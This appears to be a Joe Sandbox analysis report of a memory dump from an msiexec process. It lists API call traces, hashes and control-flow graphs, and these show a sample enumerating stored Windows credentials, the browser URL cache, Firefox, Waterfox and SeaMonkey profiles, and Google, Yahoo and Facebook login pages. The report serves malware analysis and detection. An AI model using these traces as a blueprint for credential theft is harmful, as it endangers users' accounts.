                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                              Control-flow Graph

                                                              control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 723 40e283-40e286 717->723 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 723->725 726 40e288-40e290 free 723->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: daaaff338075a090343ec421d43e38a5cea967048e4795b3800f3f5f146cf0a5
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: daaaff338075a090343ec421d43e38a5cea967048e4795b3800f3f5f146cf0a5
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                              Control-flow Graph

                                                              control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 856 40bf38-40bf48 LocalFree 853->856 857 40bf2f-40bf35 853->857 854->853 859 40bf08-40bf0e 854->859 856->845 857->856 859->853
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 1829478387-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 1829478387-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 1829478387-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLastfree
                                                              • String ID: |A
                                                              • API String ID: 981974120-1717621600
                                                              • Opcode ID: 1f69d99746321e8208190a986702b24ea6c54e93cf13cd9150f3c44d2239699d
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: 1f69d99746321e8208190a986702b24ea6c54e93cf13cd9150f3c44d2239699d
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$wcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 2489821370-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
